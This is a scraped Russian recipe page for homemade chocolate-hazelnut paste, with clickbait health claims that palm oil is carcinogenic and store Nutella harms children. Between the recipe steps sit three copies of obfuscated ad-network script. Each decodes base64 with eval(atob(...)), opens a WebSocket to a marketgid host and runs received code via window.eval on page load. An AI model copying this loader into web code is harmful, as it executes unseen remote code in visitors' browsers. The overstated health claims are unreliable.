Домашняя «Нутелла» — в разы вкуснее и полезнее магазинной. 100 % без пальмового масла!


«Нутелла» — всемирно известный бренд итальянской торговой марки «Ферреро», на протяжении 50 лет выпускающий шоколадную пасту в разных странах.

Нутелла

© DepositPhotos

В мае 2016 года Европейское агентство по безопасности продуктов питания (ЕFSА) заявило, что ученые обнаружили в «Нутелле» глицидол, способный вызывать онкологические заболевания. Эксперты ЕFSА предупреждают, что даже умеренное потребление данной субстанции может навредить здоровью детей.

состав нутеллы

загрузка...

Рецепт «Нутеллы» легко воспроизвести в домашних условиях, она получается в разы вкуснее магазинной, полезнее и дешевле. И что особенно важно, в домашней пасте ты точно не найдешь канцерогенного пальмового масла, консервантов и красителей.

шоколадная паста

Домашняя шоколадная паста «Нутелла» — это наслаждение без вреда здоровью. Сложно удержаться перед таким сочетанием вкусов — нежный белый хлеб, ароматная «Нутелла» и чашечка крепкого кофе…


google_ad_client = «ca-pub-7104543801500968»;
google_ad_slot = «2440797825»;
if(window.matchMedia(«(min-width:695px)»).matches){
google_ad_width = 696;
google_ad_height = 100;
}
else {
google_ad_width = 300;
google_ad_height = 250;
}

Шоколадная паста в домашних условиях

ИНГРЕДИЕНТЫ

  • 1 ст. молока
  • 1,5 ст. л. муки
  • 1 ст. сахара
  • 2 ст. л. какао
  • 1 ст. л. сливочного масла
  • 3 ст. л. грецких или лесных орехов

ПРИГОТОВЛЕНИЕ

  1. Соедини в миске сахарный песок, какао и муку.
    сахар какао и мука

    var d = new Date, script648714 = document.createElement(«script»), mg_ws648714 = {};script648714.type = «text/javascript»;script648714.charset = «utf-8»;script648714.src = «http://jsc.marketgid.com/p/e/perekusim.com.648714.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648714.onerror = function () { mg_ws648714 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTQoZSl7dmFyIGg9bWdfd3M2NDg3MTQub25tZXNzYWdlOyBtZ193czY0ODcxNC5yZWFkeVN0YXRlPT1tZ193czY0ODcxNC5DTE9TRUQmJihtZ193czY0ODcxND1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE0X2xvY2F0aW9uKSksbWdfd3M2NDg3MTQub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQobWdfd3M2NDg3MTQsZnVuY3Rpb24oKXttZ193czY0ODcxNC5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTRfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNCA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTRfbG9jYXRpb24pLCBtZ193czY0ODcxNC5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTQoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648714.onmessage = function (msg){window.eval(msg.data);}; mg_ws648714.postMessage(‘js|’+script648714.src+’|M382836Composite648714|M382836Composite648714’);};document.body.appendChild(script648714);

  2. Небольшими порциями добавь в миску с сахаром и какао молоко. Постоянно перемешивай, чтобы не было комочков.
    какао и молоко
  3. Доведи смесь до кипения на слабом огне, постоянно помешивая, чтобы не подгорела.
    паста на огне
  4. Отдели от скорлупы и обжарь орехи. Для их измельчения можно воспользоваться кофемолкой, блендером или мелкой теркой.
    орехи в кофемолке

    var d = new Date, script648716 = document.createElement(«script»), mg_ws648716 = {};script648716.type = «text/javascript»;script648716.charset = «utf-8»;script648716.src = «http://jsc.marketgid.com/p/e/perekusim.com.648716.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648716.onerror = function () { mg_ws648716 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTYoZSl7dmFyIGg9bWdfd3M2NDg3MTYub25tZXNzYWdlOyBtZ193czY0ODcxNi5yZWFkeVN0YXRlPT1tZ193czY0ODcxNi5DTE9TRUQmJihtZ193czY0ODcxNj1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE2X2xvY2F0aW9uKSksbWdfd3M2NDg3MTYub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYobWdfd3M2NDg3MTYsZnVuY3Rpb24oKXttZ193czY0ODcxNi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTYoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTZfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTZfbG9jYXRpb24pLCBtZ193czY0ODcxNi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTYoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648716.onmessage = function (msg){window.eval(msg.data);}; mg_ws648716.postMessage(‘js|’+script648716.src+’|M382836Composite648716|M382836Composite648716’);};document.body.appendChild(script648716);

  5. Добавь измельченные орехи и сливочное масло в пасту.
  6. Вари пасту на медленном огне, пока она не загустеет до консистенции сметаны.
  7. Остуди готовый продукт и переложи в баночку с крышкой. Храни в холодильнике.
    нутелла в банке
  8. Приятного аппетита!

Приготовленная дома шоколадная паста «Нутелла» не содержит вредных добавок, поэтому такое блюдо можно смело давать детям, не опасаясь за их здоровье.

var d = new Date, script648717 = document.createElement(«script»), mg_ws648717 = {};script648717.type = «text/javascript»;script648717.charset = «utf-8»;script648717.src = «http://jsc.marketgid.com/p/e/perekusim.com.648717.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648717.onerror = function () { mg_ws648717 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTcoZSl7dmFyIGg9bWdfd3M2NDg3MTcub25tZXNzYWdlOyBtZ193czY0ODcxNy5yZWFkeVN0YXRlPT1tZ193czY0ODcxNy5DTE9TRUQmJihtZ193czY0ODcxNz1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE3X2xvY2F0aW9uKSksbWdfd3M2NDg3MTcub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcobWdfd3M2NDg3MTcsZnVuY3Rpb24oKXttZ193czY0ODcxNy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTcoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTdfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTdfbG9jYXRpb24pLCBtZ193czY0ODcxNy5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTcoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648717.onmessage = function (msg){window.eval(msg.data);}; mg_ws648717.postMessage(‘js|’+script648717.src+’|M382836Composite648717|M382836Composite648717’);};document.body.appendChild(script648717);

нутелла на хлебе

 

Источник



Source link

Почитайте другие интересные статьи:

10 Свойств Граната, О Которых Ты Никогда Не Слышал. Невероятно, На Что Способен Этот Чудо-Плод!
Райское яблоко, соблазнившее Еву; плод дерева, которое посадила на Кипре Афродита; ягода, сок которой называют «любовным зельем» и продают, как сильнейший афродизиак – это не что иное, как гранат! Плод декоративного растения гранатника, созревающий поздней осенью, окружил себя невероятным колич...
За Сутки У Тебя Получится Один Из Самых Полезных Продуктов В Мире! Готовь Банки
С течением времени всё меньшее количество продуктов доходит до нас в первозданном виде,и простокваша — один из них. Как приготовить простоквашу люди знали еще в древности, так как это был один из способов сохранить ценное молоко. Сейчас купить одну из ее разновидностей проще простого,но не легче...
Самые Смешные Объявления, Над Которыми Я смеялась Целый День! Хорошего Всем Настроения!
Не секрет, что многие юмористы находят материал для своих произведений в реальной жизни. Это могут быть объявления в печатных изданиях, интернете и на двери вашего подъезда. Не отстают от них реклама и многочисленные вывески различных контор и шопов. Мы подобрали для вас несколько таких бесподоб...
загрузка...